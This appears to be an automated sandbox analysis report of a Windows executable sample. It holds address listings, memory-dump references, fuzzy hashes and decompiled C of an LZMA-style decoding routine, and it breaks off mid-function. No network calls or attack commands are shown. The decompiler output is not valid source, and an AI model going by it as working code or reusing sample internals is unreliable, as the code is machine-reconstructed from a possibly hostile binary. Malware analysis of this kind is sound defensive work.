                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00000000
                                                                                                            0x0040685b
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406566
                                                                                                            0x00406569
                                                                                                            0x0040656c
                                                                                                            0x0040656e
                                                                                                            0x00406570
                                                                                                            0x00406570
                                                                                                            0x00406571
                                                                                                            0x00406574
                                                                                                            0x0040657b
                                                                                                            0x0040657e
                                                                                                            0x0040658c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406871
                                                                                                            0x00406871
                                                                                                            0x00406875
                                                                                                            0x004069ad
                                                                                                            0x00000000
                                                                                                            0x004069ad
                                                                                                            0x0040687b
                                                                                                            0x0040687e
                                                                                                            0x00406881
                                                                                                            0x00406885
                                                                                                            0x00406888
                                                                                                            0x0040688e
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406890
                                                                                                            0x00406893
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406896
                                                                                                            0x00406899
                                                                                                            0x00406899
                                                                                                            0x0040689d
                                                                                                            0x004068fd
                                                                                                            0x00406900
                                                                                                            0x00406905
                                                                                                            0x00406906
                                                                                                            0x00406908
                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00406819
                                                                                                            0x0040689f
                                                                                                            0x004068a5
                                                                                                            0x004068a8
                                                                                                            0x004068ab
                                                                                                            0x004068ae
                                                                                                            0x004068b1
                                                                                                            0x004068b4
                                                                                                            0x004068b7
                                                                                                            0x004068ba
                                                                                                            0x004068bd
                                                                                                            0x004068c0
                                                                                                            0x004068d9
                                                                                                            0x004068dc
                                                                                                            0x004068df
                                                                                                            0x004068e2
                                                                                                            0x004068e6
                                                                                                            0x004068e8
                                                                                                            0x004068e8
                                                                                                            0x004068e9
                                                                                                            0x004068ec
                                                                                                            0x004068c2
                                                                                                            0x004068c2
                                                                                                            0x004068ca
                                                                                                            0x004068cf
                                                                                                            0x004068d1
                                                                                                            0x004068d4
                                                                                                            0x004068d4
                                                                                                            0x004068ef
                                                                                                            0x004068f6
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x004068f8
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x004069b7
                                                                                                            0x004069bd
                                                                                                            0x004069bf
                                                                                                            0x004069c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                            • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                            • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                            • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
